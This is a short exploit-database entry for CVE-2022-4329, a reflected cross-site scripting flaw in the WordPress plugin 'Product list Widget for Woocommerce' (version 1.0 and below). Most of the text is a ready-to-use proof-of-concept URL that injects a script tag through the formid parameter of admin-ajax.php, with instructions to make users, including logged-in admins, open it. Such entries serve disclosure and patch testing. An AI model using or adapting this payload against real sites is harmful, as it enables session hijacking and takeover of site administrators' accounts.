Exploit for Product list Widget for Woocommerce <= 1.0 - Reflected XSS CVE-2022-4329

Name: Exploit for Product list Widget for Woocommerce <= 1.0 - Reflected XSS CVE-2022-4329
Rating: 5 (121 reviews)

2022-12-08 | CVSS 0.3

## https://sploitus.com/exploit?id=WPEX-ID:D7F2C1C1-75B7-4AEC-8574-F38D506D064A
Make any unauthenticated or authenticated users (such as a logged-in admin) open the following URL:

https://example.com/wp-admin/admin-ajax.php?action=gmwqp_change_cat&option=taxonomy&formid="></select><script>alert(`xss`)</script>